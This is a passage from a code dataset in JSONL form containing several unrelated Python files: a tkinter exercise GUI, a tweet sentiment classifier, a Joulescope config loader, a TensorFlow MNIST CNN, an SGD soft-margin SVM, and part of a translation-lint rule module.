interval)\n for i in range(loop):\n colorize()\n sleep(interval - pause)\n fill(\"gray\")\n sleep(pause)\n\n\ndef confirm():\n reset()\n\n global interval\n global timer\n global amount_of_colors\n interval = float(sliderFreq.get())\n timer = int(60 * sliderTime.get())\n\n for ctr, int_var in enumerate(cb_intvar):\n color = clr[ctr]\n if int_var.get() == 0:\n colors.pop(color)\n amount_of_colors -= 1\n\n if len(colors) == 0:\n reset()\n\n set_labels()\n\n\n# GUI ------------------------------------------------------------------------------------------------------------------\nroot = Tk()\n\ncolour = StringVar()\ncolour.set(\"gray\")\n\ntopFrame = Frame(root)\ntopFrame.pack(fill=\"x\")\n\ntopLeft = Frame(topFrame)\ntopLeft.pack(side=\"left\", fill=\"y\")\ntopCenter = Frame(topFrame)\ntopCenter.pack(side=\"left\", fill=\"y\")\ntopRight = Frame(topFrame)\ntopRight.pack(side=\"bottom\", anchor=\"e\", fill=\"y\")\n\nsliderFreq = Scale(topLeft, from_=0.5, to=5, orient=HORIZONTAL, length=300, resolution=0.1, label=\"Interval in seconds\")\nsliderFreq.set(interval)\nsliderFreq.pack(padx=20, pady=5)\n\nsliderTime = Scale(topLeft, from_=0.1, to=10, orient=HORIZONTAL, length=300, resolution=0.1, label=\"Time in minutes\")\nsliderTime.set(timer/60)\nsliderTime.pack(padx=20, pady=5)\n\ntBtn = Button(topLeft, text=\"Confirm settings\", command=confirm)\ntBtn.pack(fill=\"x\", padx=20, pady=10)\n\ni = 0\ncb_intvar = []\nfor color in check:\n cb_intvar.append(IntVar())\n colorButton = Checkbutton(topCenter, text=color, variable=cb_intvar[-1])\n if check.get(color):\n colorButton.select()\n colorButton.grid(row=int(i/2), column=i % 2, padx=30, pady=15, sticky=W)\n i += 1\n\n\nLabel(topRight, text=\"Interval (s):\").grid(row=0, column=0, sticky=W, padx=20, pady=10)\nlabelFreq = StringVar()\nLabel(topRight, textvariable=labelFreq).grid(row=0, column=1, padx=20, pady=10)\n\nLabel(topRight, text=\"Time (min):\").grid(row=1, column=0, sticky=W, padx=20, pady=10)\nlabelTime = StringVar()\nLabel(topRight, textvariable=labelTime).grid(row=1, column=1, padx=20, pady=10)\n\nLabel(topRight, text=\"# Colors:\").grid(row=2, column=0, sticky=W, padx=20, pady=10)\nlabelColors = StringVar()\nLabel(topRight, 
textvariable=labelColors).grid(row=2, column=1, padx=20, pady=10)\n\nset_labels()\n\n\nbtn = Button(topRight, text=\"Start exercise\", command=looper).grid(row=3, padx=20, pady=10, columnspan=2, sticky=N+S+E+W)\n\n\nbottomFrame = Frame(root, bg=colour.get(), height=400, width=800)\nbottomFrame.pack(side=BOTTOM, fill=\"both\", expand=1)\n\nroot.mainloop()\n","sub_path":"basicGui.py","file_name":"basicGui.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"432850511","text":"from sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.pipeline import Pipeline\nimport numpy as np\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.metrics import f1_score\nfrom sklearn import linear_model\nimport re\nimport string\nfrom sklearn.model_selection import train_test_split\nimport csv\nimport matplotlib.pyplot as plt\n\n# import tweets with positive or negative labels\nwith open('two_point_tweet.tsv') as tsv:\n reader = csv.reader(tsv,delimiter=\"\\t\")\n data = list(reader)\n\ndata = np.array(data)\n\n# pattern for repeated character in a word\nreplacement_patterns = [\n (r'won\\'t', 'will not'),\n (r'can\\'t', 'cannot'),\n (r'i\\'m', 'i am'),\n (r'ain\\'t', 'is not'),\n (r'(\\w+)\\'ll', '\\g<1> will'),\n (r'(\\w+)n\\'t', '\\g<1> not'),\n (r'(\\w+)\\'ve', '\\g<1> have'),\n (r'(\\w+)\\'s', '\\g<1> is'),\n (r'(\\w+)\\'re', '\\g<1> are'),\n (r'(\\w+)\\'d', '\\g<1> would')\n]\n\n# Replace abbreviation\ndef replaceShort(s):\n for (pattern,repl) in replacement_patterns:\n s = re.sub(pattern,repl,s)\n return s\n\n# Replace character reprition\ndef replaceRep(s):\n repl_word = re.sub(r'(\\w*)(\\w)\\2(\\w*)',r'\\1\\2\\3',s)\n if repl_word != s:\n return replaceRep(repl_word)\n else:\n return repl_word\n\n# Convert positive to 1, negative to 0\ndef classToNum(s):\n if s == 'negative':\n return 0\n elif s == 'positive':\n return 1\n\n# Data preprocessing\n# Extract labels and tweets\ndata = data[:,2:]\n# Convert tweets to lower class\ndata[:,1] = [x.lower() for x in data[:,1]]\n# Delete 'not available' tweets\ndata = np.array([x for x in data if x[1] != 'not available'])\n# Delete '#' in a tweet\ndata[:,1] = [re.sub('#','',x) for x in data[:,1]]\n# Delete '@' in a tweet\ndata[:,1] = [re.sub('@','',x) for x in data[:,1]]\n# Delete URL address\ndata[:,1] = [re.sub(' http.*\\w','',x) for x in data[:,1]]\ndata[:,1] = [re.sub(' http.*\\d','',x) for x in data[:,1]]\n# Convert abbreviation for number to proper English\ndata[:,1] = [re.sub('1st','first',x) for x in data[:,1]]\ndata[:,1] = [re.sub('2nd','second',x) for x in data[:,1]]\ndata[:,1] = [re.sub('3rd','third',x) for x in data[:,1]]\ndata[:,1] = [re.sub('4th','fourth',x) for x in data[:,1]]\ndata[:,1] = [re.sub('5th','fifth',x) for x in data[:,1]]\ndata[:,1] = [re.sub('6th','sixth',x) for x in data[:,1]]\ndata[:,1] = [re.sub('7th','seventh',x) for x in data[:,1]]\ndata[:,1] = [re.sub('8th','eighth',x) for x in data[:,1]]\ndata[:,1] = [re.sub('9th','nineth',x) for x in data[:,1]]\n# Delete all numbers\ndata[:,1] = [re.sub('\\d','',x) for x in data[:,1]]\n# Delete all punctuation\ndata[:,1] = [''.join(c for c in x if c not in string.punctuation) for x in data[:,1]]\n# Replace abbreviation\ndata[:,1] = [replaceShort(x) for x in data[:,1]]\n# Replace character repetition with proper English\ndata[:,1] = [replaceRep(x) for x in 
data[:,1]]\n# Delete excessive whitespace\ndata[:,1] = [re.sub('\\s+',' ',x) for x in data[:,1]]\n\n# Categories of tweets\ncategories = ['negative','positive']\n# Convert labels of tweets to number\ndata[:,0] = [classToNum(x) for x in data[:,0]]\n# Declare lists of accuracies and F-score for different classification method and size of training set\naccuracy_NB = []\naccuracy_SVM = []\naccuracy_Mul = []\naccuracy_ensem1 = []\naccuracy_ensem2 = []\nF_score_NB = []\nF_score_SVM = []\nF_score_Mul = []\nF_score_ensem1 = []\nF_score_ensem2 = []\nholder = data\n\n# Print out classification accuracy and F-score\ndef printScore(predicted,y_test,s):\n print(s)\n print('prediction accuracy:', np.mean(predicted == y_test))\n print('F-score:', f1_score(y_test,predicted))\n\n# Loop from 10% to 100% training set size, append the result in respective list\nfor j in range(1,11):\n # X holds tweets, y holds labels\n X = data[:,1]\n y = data[:,0]\n y = [int(s) for s in y]\n \n # Split train, test set\n X_train, X_test, y_train, y_test = train_test_split(X,y,test_size=0.33,random_state=45)\n X_train = X_train[:int(len(X_train)*j/10)]\n y_train = y_train[:int(len(y_train)*j/10)]\n \n # Naive Bayes\n text_clf = Pipeline([('vect', CountVectorizer()),('tfidf', TfidfTransformer()),('clf', MultinomialNB()),])\n text_clf = text_clf.fit(X_train, y_train)\n docs_test = X_test\n predicted_NB = text_clf.predict(docs_test)\n accuracy_NB.append(np.mean(predicted_NB == y_test))\n F_score_NB.append(f1_score(y_test,predicted_NB))\n \n # Support Vector Machine\n text_clf = Pipeline([('vect', CountVectorizer()),('tfidf', TfidfTransformer()),('clf', SGDClassifier(loss='hinge', penalty='l2',alpha=1e-3, n_iter=30, random_state=42)),])\n text_clf = text_clf.fit(X_train, y_train)\n predicted_SVM = text_clf.predict(docs_test)\n accuracy_SVM.append(np.mean(predicted_SVM == y_test))\n F_score_SVM.append(f1_score(y_test,predicted_SVM))\n \n # Multinomial Logistic Regression\n text_clf = Pipeline([('vect', CountVectorizer()),('tfidf', TfidfTransformer()),('clf', linear_model.LogisticRegression()),])\n text_clf = text_clf.fit(X_train, y_train)\n predicted_Mul = text_clf.predict(docs_test)\n accuracy_Mul.append(np.mean(predicted_Mul == y_test))\n F_score_Mul.append(f1_score(y_test,predicted_Mul))\n \n # Ensemble 1\n # Predict positive only if NB, SVM and Multinomial predicts positive\n predicted_ensem1 = []\n for i in range(len(predicted_NB)):\n if predicted_NB[i] == 1 and predicted_SVM[i] == 1 and predicted_Mul[i] ==1:\n predicted_ensem1.append(1)\n else:\n predicted_ensem1.append(0)\n predicted_ensem1 = np.array(predicted_ensem1)\n accuracy_ensem1.append(np.mean(predicted_ensem1 == y_test))\n F_score_ensem1.append(f1_score(y_test,predicted_ensem1))\n \n # Ensemble 2\n # Predict positive if any of NB, SVM and Multinomial predicts positive\n predicted_ensem2 = []\n for i in range(len(predicted_NB)):\n if predicted_NB[i] == 1 or predicted_SVM[i] == 1 or predicted_Mul[i] == 1:\n predicted_ensem2.append(1)\n else:\n predicted_ensem2.append(0)\n predicted_ensem2 = np.array(predicted_ensem2)\n accuracy_ensem2.append(np.mean(predicted_ensem2 == y_test))\n F_score_ensem2.append(f1_score(y_test,predicted_ensem2))\n\n# Plot classification accuracy\nplt.plot(accuracy_NB,marker='o',label='NB')\nplt.plot(accuracy_SVM,marker='o',label='SVM')\nplt.plot(accuracy_Mul,marker='o',label='Multi')\nplt.plot(accuracy_ensem1,marker='o',label='Ensem1')\nplt.plot(accuracy_ensem2,marker='o',label='Ensem2')\nplt.ylabel('Classification 
Accuracy')\nplt.xlabel('Percentage of Training Size')\nplt.title('Classification Accuracy vs. Training Set Size')\nplt.legend()\naxes = plt.gca()\naxes.set_ylim([0.8,0.90])\nplt.show()\nplt.close()\n\n# Plot F-score\nplt.plot(F_score_NB,marker='o',label='NB')\nplt.plot(F_score_SVM,marker='o',label='SVM')\nplt.plot(F_score_Mul,marker='o',label='Multi')\nplt.plot(F_score_ensem1,marker='o',label='Ensem1')\nplt.plot(F_score_ensem2,marker='o',label='Ensem2')\nplt.ylabel('F-sore')\nplt.xlabel('Percentage of Training Size')\nplt.title('F-score vs. Training Set Size')\nplt.legend()\naxes = plt.gca()\naxes.set_ylim([0.90,0.95])\nplt.show()\n","sub_path":"program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":7225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"291248437","text":"# Copyright 2018 Jetperch LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Manage Joulescope application configurations\"\"\"\n\nimport json5\nimport os\nimport pkgutil\nimport collections\nimport logging\n\nlog = logging.getLogger(__name__)\n\n\ntry:\n from win32com.shell import shell, shellcon\n USER_PATH = shell.SHGetFolderPath(0, shellcon.CSIDL_PERSONAL, None, 0)\n APPDATA_PATH = shell.SHGetFolderPath(0, shellcon.CSIDL_LOCAL_APPDATA, None, 0)\n APP_PATH = os.path.join(APPDATA_PATH, 'joulescope')\nexcept:\n USER_PATH = os.path.expanduser('~')\n APP_PATH = os.path.join(USER_PATH, '.joulescope')\n\nSAVE_PATH_DEFAULT = os.path.join(USER_PATH, 'joulescope')\nCONFIG_PATH = os.path.join(APP_PATH, 'config.json5')\n\n\nif not os.path.isdir(APP_PATH):\n os.makedirs(APP_PATH)\n\n\ndef _substitute(entry, value):\n if entry.get('type') == 'path':\n attributes = entry.get('attributes', [])\n if value == '__SAVE_PATH__':\n value = SAVE_PATH_DEFAULT\n if 'exists' in attributes and not os.path.exists(value):\n os.makedirs(value)\n elif 'exists' in attributes and not os.path.exists(value):\n raise ValueError('path does not exist: %s' % (value, ))\n return value\n\n\ndef validate(config_def, cfg, path=None, default_on_error=None):\n \"\"\"Validate that the configuration is valid.\n\n :param config_def: The configuration definition data structure.\n See config_def.json5 for the data structure format.\n :param cfg: The configuration to validate against the config_def.\n :param path: The path used recursively by this function.\n This value should not be provided by the initial caller.\n :param default_on_error: When true, presume the default value on\n validation errors.\n :return: True on validate success, False on failure.\n \"\"\"\n path = '' if path is None else str(path)\n if 'info' in config_def: # handle top level\n config_def = config_def['children']\n y = {}\n k2 = list(cfg.keys())\n for entry in config_def: # list of entry dicts\n t = entry.get('type', 'str')\n key = entry['name']\n p = path + '.' 
+ key\n if t == 'map':\n if key in cfg:\n v = cfg[key]\n if isinstance(v, collections.abc.Mapping):\n y[key] = validate(entry['children'], v, default_on_error=default_on_error)\n else:\n raise ValueError('%s should be map' % (p, ))\n else:\n y[key] = validate(entry['children'], {}, default_on_error=default_on_error)\n else:\n v = cfg.get(key, entry.get('default'))\n if v is not None:\n if t == 'str' and 'options' in entry:\n values = {}\n for x in entry['options']:\n n = x['name']\n for e in [n] + x.get('aliases', []):\n if e in values:\n raise ValueError('Invalid configuration: duplicate key %s' % (e, ))\n values[e] = n\n if v not in values:\n if bool(default_on_error):\n d = entry.get('default')\n log.warning('%s: Value \"%s\" invalid, use default \"%s\"', p, v, d)\n v = d\n else:\n raise ValueError('%s: Value \"%s\" not in %s' % (p, v, values))\n v = values[v]\n y[key] = _substitute(entry, v)\n if key in k2:\n k2.remove(key)\n for k in k2:\n p = path + '.' + k\n log.info('Unexpected entry: %s', p)\n return y\n\n\ndef find_child_by_name(d, name):\n \"\"\"Find a specification configuration definition child.\n\n :param d: The configuration definition list with dict elements that\n have a key 'name'.\n :param name: The name to match against the 'name' key in each list\n element.\n :return: The matching element or None.\n\n Fastest implementation, no.\n Simplest while maintaining guaranteed order, yes.\n \"\"\"\n for entry in d['children']:\n if entry['name'] == name:\n return entry\n return None\n\n\ndef _cfg_def_normalize(d):\n child_map = {}\n for entry in d:\n if 'name' not in entry:\n raise ValueError('entry missing name')\n name = entry['name']\n if name in child_map:\n raise ValueError('duplicate name')\n child_map[name] = entry\n t = entry.get('type', 'str')\n entry['type'] = t # ensure all entries have type\n if t == 'str' and 'options' in entry:\n values = []\n for v in entry['options']:\n if isinstance(v, collections.abc.Mapping):\n values.append(v)\n else:\n x = {\n 'name': v,\n 'brief': '',\n }\n values.append(x)\n entry['options'] = values\n elif t == 'map':\n entry['children'] = _cfg_def_normalize(entry['children'])\n return d\n\n\ndef load_config_def(path: str=None):\n \"\"\"Load a configuration definition.\n\n :param path: The full path to the configuration definition.\n None (default) uses the config_def.json5 included with this\n package.\n :return: The configuration definition.\n See config_def.json5 for the data structure format.\n \"\"\"\n if path is None:\n bin_file = pkgutil.get_data('joulescope_ui', 'config_def.json5')\n d = json5.loads(bin_file, encoding='utf-8')\n elif not os.path.isfile(path):\n raise ValueError('config_def does not exist: %s' % (path, ))\n else:\n log.info('load_config_def %s', path)\n with open(path, 'r') as f:\n d = json5.load(f)\n # todo: validate the validator?\n d['children'] = _cfg_def_normalize(d['children'])\n return d\n\n\ndef load_config(config_def, path=None, default_on_error=None):\n \"\"\"Load the configuration.\n\n :param config_def: The configuration definition used to validate the\n loaded configuration.\n See config_def.json5 for the data structure format.\n :param path: The full path to the configuration definition.\n None (default) uses the platform-dependent path.\n :param default_on_error: When true, presume the default value on\n validation errors.\n :return: The loaded configuration which consists of a two level dictionary\n that mirrors the configuration definition. 
(key -> key -> value).\n \"\"\"\n if path is None:\n path = CONFIG_PATH\n if not isinstance(path, str):\n cfg = json5.load(path)\n elif not os.path.isfile(path):\n log.info('Configuration file not found: %s', path)\n cfg = {}\n else:\n log.info('Load configuration file: %s', path)\n with open(path, 'r') as f:\n cfg = json5.load(f)\n y = validate(config_def, cfg, default_on_error=default_on_error)\n return y\n\n\ndef save_config(cfg, path=None):\n \"\"\"Save the configuration.\n\n :param cfg: The configuration which consists of a two level dictionary\n that mirrors the configuration definition. (key -> key -> value).\n :param path: The full save path.\n None (default) uses the platform-dependent path.\n \"\"\"\n if path is None:\n path = CONFIG_PATH\n if not isinstance(path, str):\n json5.dump(cfg, path, indent=2)\n else:\n with open(path, 'w') as f:\n json5.dump(cfg, f, indent=2)\n","sub_path":"joulescope_ui/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":8075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"123457311","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 16 18:34:36 2017\n\n@author: LLL\n\"\"\"\nimport os\nimport numpy as np\nfrom scipy import special\nimport tensorflow as tf\n\nclass WaveIdentifyTrain():\n def __init__(self):\n self.sess=tf.Session()\n self.data_patch_len=784\n self.data_y_len=10\n self.data_chenel_n=1\n self.w1_shape=[784,784]\n self.w2_shape=[784,784]\n self.conv1_shape=[4,self.data_chenel_n,8]\n self.conv2_shape=[4,8,16]\n\n def init_var(self):\n self.x=tf.placeholder(tf.float32,shape=[None,self.data_patch_len,self.data_chenel_n])\n self.y=tf.placeholder(tf.float32,shape=[None,self.data_y_len])\n x_3d=tf.reshape(self.x,[-1,self.data_patch_len,self.data_chenel_n])\n \n x_w1=self.my_weigh(self.conv1_shape)\n x_b1=self.my_bias([self.conv1_shape[2]])\n x_wb1=self.my_conv_1d(x_3d,x_w1)+x_b1\n x_sigm1=tf.nn.relu(x_wb1)\n x_pool1=self.my_max_pool_1d(x_sigm1)\n \n x_w2=self.my_weigh(self.conv2_shape)\n x_b2=self.my_bias([self.conv2_shape[2]])\n x_wb2=self.my_conv_1d(x_pool1,x_w2)+x_b2\n x_sigm2=tf.nn.relu(x_wb2)\n x_pool2=self.my_max_pool_1d(x_sigm2)\n \n fc1_len=int(self.data_patch_len/1/1)\n x_fc1=self.my_weigh([fc1_len*self.conv2_shape[2],128])\n b_fc1=self.my_bias([128])\n xb_fc1=tf.matmul(tf.reshape(x_pool2,[-1,fc1_len*self.conv2_shape[2]]),x_fc1)+b_fc1\n x_fc_sigma1=tf.nn.relu(xb_fc1)\n \n self.kp_prb=tf.placeholder('float')\n x_drop=tf.nn.dropout(x_fc_sigma1,self.kp_prb)\n \n fc_w1=self.my_weigh([128,self.data_y_len])\n fc_b1=self.my_bias([self.data_y_len])\n fc_wb1=tf.matmul(x_drop,fc_w1)+fc_b1\n \n result=tf.nn.softmax(fc_wb1)\n \n cross_entropy=-tf.reduce_sum(self.y*tf.log(result))\n self.train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\n #self.train_step=tf.train.GradientDescentOptimizer()\n self.sess.run(tf.global_variables_initializer())\n \n validate=tf.equal(tf.argmax(result,1),tf.argmax(self.y,1))\n self.acc=tf.reduce_mean(tf.cast(validate,'float'))\n #print(fc1_len)\n #print(np.shape(self.sess.run(result,feed_dict={self.x: np.zeros([10,784]),self.y: np.zeros([10,10]), self.kp_prb: 0.5})))\n def my_conv_1d(self,data,flt):\n return tf.nn.conv1d(data,filters=flt,stride=1, padding='SAME')\n def my_bias(self,shape):\n init=tf.constant(0.1,shape=shape)\n return tf.Variable(init)\n def my_weigh(self,shape):\n init=tf.truncated_normal(shape,stddev=0.1)\n return tf.Variable(init)\n def my_max_pool_1d(self,data):\n return 
tf.nn.pool(data,window_shape=[1],pooling_type='MAX',strides=[1],padding='SAME')\n \n def train(self,data):\n return self.sess.run(self.train_step,feed_dict={self.x: data[0], self.y: data[1], self.kp_prb:0.5})\n def validate(self,data):\n return self.sess.run(self.acc,feed_dict={self.x: data[0], self.y: data[1], self.kp_prb:1})\n\n def saver(self,step):\n self.sv=tf.train.Saver()\n try:\n self.sv.save(self.sess,'var_back/model',global_step=step)\n except:\n os.mkdir('var_back')\n self.sv.save(self.sess,'var_back/model',global_step=step)\n def restore(self,step=-1):\n if(step>0):\n self.sv.restore(self.sess,'var_back/model-'+str(step))\n else:\n self.sv.recover_last_checkpoints('var_back/')\n \n \nif __name__ == '__main__':\n print(\"Do not run this file directily!\")\n print(\"Try to run simple file:\")\n from tensorflow.examples.tutorials.mnist import input_data\n mnist = input_data.read_data_sets('MNIST_data', one_hot=True)\n aa=WaveIdentifyTrain()\n aa.init_var()\n import matplotlib.pyplot as plt\n for i in range(5000):\n batch = mnist.train.next_batch(50)\n #plt.clf()\n #plt.imshow(np.reshape(batch[0][5],[28,28]),cmap=plt.get_cmap('Blues'))\n trans=np.reshape(batch[0],[-1,784,1])\n aa.train([trans,batch[1]])\n if(i%10==9):\n print(\"train step:%d accuracy:%f\"%(i,aa.validate([np.reshape(mnist.test.images,[-1,784,1]),mnist.test.labels])))\n #aa.saver(i)\n \n #aa.restore(109)\n #print(\"restore test\")\n #print(aa.validate([mnist.test.images,mnist.test.labels]))\n\n\n#con_x_1d=tf.nn.conv1d(x1d,filters=x1d_cov,stride=1, padding='SAME')","sub_path":"WaveIdentification/wave_rnn.py","file_name":"wave_rnn.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"260172401","text":"import numpy as np\n\n\nclass SoftSVM:\n \"\"\" 使用Hinge损失的软间隔支持向量机的随机梯度下降算法实现 \"\"\"\n def __init__(self, C=1000) -> None:\n self.C = C\n # end\n\n def fit(self, X, y, eta=0.01, N=5000):\n \"\"\" 训练函数 \"\"\"\n m, n = X.shape\n cw, cb = np.zeros((n, 1)), 0\n self.w, self.b = np.zeros((n, 1)), 0\n for r in range(N):\n ri = np.random.randint(m)\n rx = X[ri].reshape(-1, 1)\n ry = y[ri]\n s = (np.dot(cw.T, rx) + cb)* ry\n e = (s < 1).astype(np.int64)\n g_w = -e* ry* rx + (1.0 / self.C)* cw\n g_b = -e* ry\n cw -= eta* g_w\n cb -= eta* g_b\n self.w += cw\n self.b += cb\n self.w /= N\n self.b /= N\n # end\n\n def predict(self, X):\n \"\"\" 预测函数 \"\"\"\n return np.sign(X.dot(self.w) + self.b)\n # end\n# end\n","sub_path":"Modules/SVM_SOFT_SGD.py","file_name":"SVM_SOFT_SGD.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"484595548","text":"#!/usr/bin/env python3\n# coding: utf-8\nimport re\nimport os\nimport sys\nimport fnmatch\nfrom collections import defaultdict\nfrom enum import IntEnum\nimport importlib\nfrom ansicolor import black, red\n\nclass Severity(IntEnum):\n # Notice should be used for rules where a significant number of unfixable false-positives are expected\n notice = 1\n # Info should be used for rules that have less impact and more false positives than standard rules.\n info = 2\n # Standard values should have impact on the readability that does not lead to misunderstandins.\n standard = 3\n # Warning values should have clearly visible impact on the readability.\n warning = 4\n # Dangerous values should harm the readability of the text significantly and have virtually no false-positives\n dangerous = 5\n\nif 
sys.version_info[0] < 3:\n print(\"This script requires Python version 3.x\")\n sys.exit(1)\n\n__cleanupRegex = re.compile(r'<(a|span|div|table)\\s*([a-z-]+=(\"[^\"]+\"|\\'[^\\']+\\')\\s*)*>(.+?)\\s*', re.MULTILINE)\n__cleanupDetectRegex = re.compile(r\"<(a|span|div|table)\")\n\ndef cleanupTranslatedString(s):\n \"\"\"\n Minor but fast cleanup of the msgstr in order to avoid hits in\n invisible parts like HTML.\n \"\"\"\n if not __cleanupDetectRegex.search(s):\n return s\n return __cleanupRegex.sub(r\"\\1\", s)\n\ndef importRulesForLanguage(lang, basedir=\".\"):\n \"\"\"Import ruleset from the language-specific python file\"\"\"\n moduleName = \"rules.{0}\".format(lang)\n print(black(\"Reading rules from {0}\".format(moduleName), bold=True))\n langModule = importlib.import_module(moduleName)\n print(black(\"Found {0} rules for language {1}\".format(len(langModule.rules), lang), bold=True))\n return langModule.rules\n\n_extractImgRegex = re.compile(r\"(https?://ka-perseus-graphie\\.s3\\.amazonaws\\.com/[0-9a-f]{40,40}\\.(png|svg))\")\n\nclass Rule(object):\n \"\"\"\n A baseclass for rules.\n Remember to implement __call__(self, msgstr, msgid),\n which must return the hit or None if no hit is found.\n \"\"\"\n def __init__(self, name, severity=Severity.standard):\n self.name = name\n # If you need to save some state, you can do it here.\n # This MUST NOT be filled by subclasses.\n self.custom_info = {}\n self.severity = severity\n def get_machine_name(self):\n \"\"\"Get a machine-readable name from a rule name\"\"\"\n name = self.name.lower().replace(\"'\", \"\").replace(\"\\\"\", \"\")\n name = name.replace(\"(\", \"\").replace(\")\", \"\").replace(\"{\", \"\")\n name = name.replace(\"}\", \"\").replace(\"\\\\\", \"\").replace(\",\", \"\")\n name = name.replace(\"*\", \"\").replace(\"/\", \"-\").replace(\"%\", \"\")\n name = name.replace(\"<\", \"\").replace(\">\", \"\").replace(\"/\", \"\")\n name = name.replace(\">\", \"\").replace(\"<\", \"\").replace(\":\",\"\")\n name = re.sub(r\"\\s+\", \"-\", name)\n name = re.sub(r\"-+\", \"-\", name)\n name = re.sub(r\"^-\", \"\", name)\n return name\n def getBootstrapColor(self):\n \"\"\"Get a bootstrap color class (text-...) 
depending on the severity\"\"\"\n if self.severity == Severity.notice: return \"text-muted\"\n elif self.severity == Severity.info: return \"text-success\"\n elif self.severity == Severity.standard: return \"text-primary\"\n elif self.severity == Severity.warning: return \"text-warning\"\n elif self.severity == Severity.dangerous: return \"text-danger\"\n else: return \"text-info\"\n def __lt__(self, other):\n if self.severity != other.severity:\n return self.severity < other.severity\n return self.name < other.name\n def apply_to_po(self, po, filename=\"[unknown file]\", ignore_untranslated=True):\n \"\"\"\n Apply to a dictionary of parsed PO files.\n Yields tuples entry, hit, filename\n \"\"\"\n for entry in po:\n # Ignore empty translations (-> untranslated)\n if not entry.msgstr:\n continue\n # Ignore strings which are the same orig/msgid\n # This accounts for the fact that we don't know how\n if ignore_untranslated and entry.msgstr == entry.msgid:\n continue\n # Translated string cleanup\n msgstr = cleanupTranslatedString(entry.msgstr)\n # Apply the rule\n for hit in self(msgstr, entry.msgid, entry.tcomment, filename=filename):\n #Find images in both original and new string\n origImages = [h[0] for h in _extractImgRegex.findall(entry.msgid)]\n translatedImages = [h[0] for h in _extractImgRegex.findall(entry.msgstr)]\n yield (entry, hit, filename, origImages, translatedImages)\n\nclass SimpleRegexRule(Rule):\n \"\"\"\n A simple rule type that matches a regex to the translated string.\n Partial matches (via re.search) are considered hits.\n \"\"\"\n def __init__(self, name, regex, severity=Severity.standard, flags=re.UNICODE):\n super().__init__(name, severity)\n self.re = re.compile(regex, flags)\n self.regex_str = regex\n def description(self):\n return \"Matches regular expression '%s'\" % self.regex_str\n def __call__(self, msgstr, msgid, tcomment=\"\", filename=None):\n hit = self.re.search(msgstr)\n if hit:\n yield hit.group(0)\n\nclass SimpleSubstringRule(Rule):\n \"\"\"\n A simple rule type that hits when a given substring is found in the msgstr.\n \"\"\"\n def __init__(self, name, substr, severity=Severity.standard, case_insensitive=False):\n super().__init__(name, severity)\n self.substr = substr\n self.ci = case_insensitive\n if self.ci:\n self.substr = self.substr.lower()\n def description(self):\n return \"Matches substring '%s'\" % self.substr\n def __call__(self, msgstr, msgid, tcomment=\"\", filename=None):\n # Case-insensitive preprocessing\n if self.ci:\n msgstr = msgstr.lower()\n if msgstr.find(self.substr) != -1:\n yield self.substr\n\nclass TranslationConstraintRule(Rule):\n \"\"\"\n Enforces that a certain regex in the original string will\n be translated a certain way\n\n i.e. 
the rule hits when regexOrig has >= 1 match in the msgid\n while regexTranslated has 0 machte\n \"\"\"\n def __init__(self, name, regexOrig, regexTranslated, severity=Severity.standard, flags=re.UNICODE):\n super().__init__(name, severity)\n self.reOrig = re.compile(regexOrig, flags)\n self.reTranslated = re.compile(regexTranslated, flags)\n self.regex_orig_str = regexOrig\n self.regex_translated_str = regexTranslated\n def description(self):\n return \"Matches '%s' if translated as '%s'\" % (self.regex_orig_str, self.regex_translated_str)\n def __call__(self, msgstr, msgid, tcomment=\"\", filename=None):\n if self.reOrig.search(msgid) and not self.reTranslated.search(msgstr):\n yield \"[failed constraint]\"\n\nclass NegativeTranslationConstraintRule(Rule):\n \"\"\"\n Enforces that a certain regex in the original string will\n NOT be translated a certain way,\n\n i.e. the rule hits when regexOrig has >= 1 match in the msgid\n while regexTranslated has a match.\n \"\"\"\n def __init__(self, name, regexOrig, regexTranslated, severity=Severity.standard, flags=re.UNICODE):\n super().__init__(name, severity)\n self.reOrig = re.compile(regexOrig, flags)\n self.reTranslated = re.compile(regexTranslated, flags)\n self.regex_orig_str = regexOrig\n self.regex_translated_str = regexTranslated\n def description(self):\n return \"Matches '%s' if NOT translated as '%s'\" % (self.regex_orig_str, self.regex_translated_str)\n def __call__(self, msgstr, msgid, tcomment=\"\", filename=None):\n if self.reOrig.search(msgid) and self.reTranslated.search(msgstr):\n yield \"[failed constraint]\"\n\nclass DynamicTranslationIdentityRule(Rule):\n \"\"\"\n Enforces that a match to the given regex does is contained in the translated string as-is.\n This rule can also be used as a negative rule to enforce the match is not present\n in the translated string.\n \"\"\"\n def __init__(self, name, regex, negative=False, group=None, severity=Severity.standard, flags=re.UNICODE):\n super().__init__(name, severity)\n self.regex_str = regex\n self.regex = re.compile(regex, flags)\n self.negative = negative\n self.group = group\n def description(self):\n return \"Matches a match for '%s' if %spresent in the translated string\" % (self.regex_str, \"NOT \" if self.negative else \"\")\n def __call__(self, msgstr, msgid, tcomment=\"\", filename=None):\n matches = self.regex.findall(msgid)\n if not matches: return\n # Apply group filter if enabled\n if self.group is not None:\n matches = [m[self.group] for m in matches]\n # Check individual matches\n if self.negative:\n for match in matches:\n if match in msgstr:\n yield match\n else: # Positive rule\n for match in matches:\n if match not in msgstr:\n yield match\n\ndef SimpleGlobRule(name, glob):\n 